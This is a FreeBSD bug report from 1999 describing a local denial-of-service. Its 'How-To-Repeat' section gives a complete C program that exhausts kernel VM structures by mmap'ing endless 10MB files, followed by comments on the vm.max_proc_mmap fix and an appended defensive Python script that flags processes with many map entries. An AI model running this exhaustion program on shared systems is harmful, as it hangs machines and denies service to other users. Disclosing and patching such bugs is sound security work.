Bug 14614

Summary: VM DoS attack (with exploit attached)
Product: Base System
Reporter: sobomax <sobomax>
Component: kern
Assignee: Matt Dillon <dillon>
Status: Closed FIXED
Severity: Affects Only Me
Priority: Normal
Version: 4.0-CURRENT
Hardware: Any
OS: Any

Description sobomax 1999-10-31 00:10:00 UTC
Any unprivileged user with shell access and 10-20MB of disk quota
can hang a FreeBSD machine using the following program. This program simply
mmap's large files without unmap'ing them. I have not found a way to
prevent this attack, either using disk quotas or using memory limits in
login.conf.

I have personally tested that it works on 4.0; however, others report that 3.3
is also affected.

How-To-Repeat:
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
    int fd;
    int i;
    int len=1024*1024*10;  /*ie 10Mbytes*/
    caddr_t addr;
    char ttt[80];

    /* Loop forever: create one 10MB file per iteration and map it in,
     * never calling munmap(), so the mappings accumulate. */
    for (i=0;;i++)
    {
    sprintf (ttt,"%d",i);
    fd=open(ttt,O_CREAT|O_RDWR,0666);
    if (fd<0)
    {
        printf("open error %d\n",errno);
        exit(1);
    }
    /* Extend the file to len bytes by writing one byte at the end. */
    lseek(fd,len-1,SEEK_SET);
    write(fd,"",1);
    addr=mmap(0,len,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0);
    if (addr==MAP_FAILED)
    {
        printf("mmap error %d\n",errno);
        exit(1);
    }
    close(fd);
    /* Touch every page so the mapping is actually populated. */
    memset(addr,'x',len);
    }
}
Comment 1 Kris Kennaway freebsd_committer freebsd_triage 2000-06-26 07:12:22 UTC
Responsible Changed
From-To: freebsd-bugs->dillon

Verified this does do something nasty even with resource limits in
place (I was seeing what seemed to be a held inode lock in the kernel).
I also had pagedaemon going crazy when I ran this on an MFS.

Comment 2 hiten pandya 2002-03-20 15:36:12 UTC
Is this issue solved?

  -- Hiten
  -- <hiten@uk.FreeBSD.org>

Comment 3 Matt Dillon freebsd_committer freebsd_triage 2002-03-20 18:44:45 UTC
State Changed
From-To: open->closed

This bug was fixed in Feb 2000 (2 years ago).  We now limit the number of 
tracking structures the kernel is able to allocate on behalf of any single 
process via the vm.max_proc_mmap sysctl.
Comment 4 Matthew Dillon 2002-03-20 18:45:03 UTC
:Is this issue solved?
:
:  -- Hiten
:  -- <hiten@uk.FreeBSD.org>

    I'll close the ticket.  It was fixed in February 2000 (two years ago).
    We now have a vm.max_proc_mmap sysctl that limits the number of 
    vm_map_entry structures the kernel is allowed to allocate on behalf of
    a process.

					-Matt
					Matthew Dillon 
					<dillon@backplane.com>
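The fix described in the last two comments caps the number of vm_map_entry structures per process via vm.max_proc_mmap. The following added example (not part of the bug report or of FreeBSD) is a small monitoring script from the defender's side: it counts map entries per PID in `procstat -va` output and flags processes approaching that limit. The column layout of `procstat -va` (header line, then one row per entry whose first column is the PID) is assumed, and the embedded sample is constructed.

```python
"""Flag processes whose VM map entry count approaches vm.max_proc_mmap.

Added example, not from the bug report. Usage on a live FreeBSD box
(assumed procstat/sysctl invocations):
    procstat -va | python3 mapwatch.py "$(sysctl -n vm.max_proc_mmap)"
Without an argument it runs against the constructed SAMPLE with limit 16.
"""
import sys
from collections import Counter

# Constructed sample in the assumed `procstat -va` layout. PID 4242 has
# accumulated a dozen 10MB file mappings; the other two look normal.
SAMPLE = (
    "  PID              START                END PRT  RES PRES REF SHD FLAG TP PATH\n"
    "  1001           0x400000           0x401000 r--    1    1   1   0 CN-- vn /bin/sh\n"
    "  1001          0x8400000          0x8401000 rw-    1    1   1   0 ---- df\n"
    "  4242           0x400000           0x401000 r--    1    1   1   0 CN-- vn /home/u/a.out\n"
    + "".join(
        f"  4242 0x{0x20000000 + i * 0xa00000:x} 0x{0x20a00000 + i * 0xa00000:x}"
        f" rw-  2560 2560   1   0 ---- vn /home/u/{i}\n"
        for i in range(12)
    )
    + "  2002           0x400000           0x401000 r--    1    1   1   0 CN-- vn /usr/bin/top\n"
)


def count_map_entries(text):
    """Return {pid: number of map entries} for one procstat -va dump."""
    counts = Counter()
    for line in text.splitlines():
        fields = line.split()
        if not fields or not fields[0].isdigit():  # header or blank line
            continue
        counts[int(fields[0])] += 1
    return dict(counts)


def flag_processes(counts, limit, warn_fraction=0.8):
    """Return sorted [(pid, entries)] at or above warn_fraction of limit."""
    threshold = limit * warn_fraction
    return sorted((pid, n) for pid, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        limit, text = int(sys.argv[1]), sys.stdin.read()
    else:
        limit, text = 16, SAMPLE  # tiny constructed limit so the sample trips
    for pid, n in flag_processes(count_map_entries(text), limit):
        print(f"pid {pid}: {n} map entries ({100 * n / limit:.0f}% of vm.max_proc_mmap={limit})")
```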